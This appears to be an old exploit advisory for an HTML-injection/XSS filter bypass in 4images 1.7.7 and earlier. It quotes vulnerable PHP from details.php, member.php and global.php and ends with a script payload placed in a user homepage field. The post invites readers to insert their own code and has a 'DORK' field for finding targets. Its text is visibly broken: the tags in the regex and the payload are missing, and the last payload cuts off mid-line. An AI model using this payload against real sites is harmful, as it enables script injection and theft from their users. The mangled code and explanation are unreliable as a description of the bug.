|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . =By: Qabandi =Email: iqa[a]hotmail.fr From Kuwait, PEACE... =Vuln: 4images <= 1.7.7 - filter bypass HTML injection/XSS =INFO: ~~~ =BUY: ~~~ =DORK: ~~~ _-=/:Conditions:\=-_ --------------------------------------------------------------------------------- ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = Off Comments allowed[+] Registration[+] Works on default 4images comments settings. XSS used works with latest FireFox browser, you can use your own code. --------------------------------------=_=--------------------------------------- _-=/:Vulnerable_Code:\=-_ --------------------------------------------------------------------------------- in "./4images/details.php" we see::--//First-Mistake//-- 380:: $comment_user_homepage = (isset($comment_row[$i][$user_table_fields['user_homepage']])) ? format_url($comment_row[$i][$user_table_fields['user_homepage']]) : ""; 381:: if (!empty($comment_user_homepage)) { //as you can see, it just grabs whatever is in the SQL database and adds it, puts it thru format_url() //which is nothing and relies on the filter when creating or editing USER_HOMEPAGE //lets take a look what happends when updating user_homepage in "./4images/member.php":://this what happends when UPDATING user_homepage thru the profile page 1053:: $user_homepage = (isset($HTTP_POST_VARS['user_homepage'])) ? format_url(un_htmlspecialchars(trim($HTTP_POST_VARS['user_homepage']))) : ""; //user_homepage goes thru THREE functions, lets see what they do.. //format_url(); function format_url($url) { if (empty($url)) { return ''; } if (!preg_match("/^https?:\/\//i", $url)) { $url = "http://".$url; } return $url; } ///ok cool makes sure the URL is cool //trim() <-- built in PHP function //un_htmlspecialchars(); function un_htmlspecialchars($text) { $text = str_replace( array('<', '>', '"', '&'), array('<', '>', '"', '&'), $text ); return $text; } //interesting but im afraid this is another mistake Q_Q //anyway, point is the XSS filter in GLOBAL.PHP can be bypassed // Lets take a small look at what the script does with all vars in "./4images/global.php":: 181:: // Remove really unwanted tags 182:: do { 183:: $oldstring = $string; 184:: $string = preg_replace('#]*>#i',"",$string); 185:: } while ($oldstring != $string); 186:: 187:: return $string; 188:: } //Can be bypassed.. // since it looks for The script will convert it to : http://www.dummy.com/">alert('qabandi') now type this :) http://">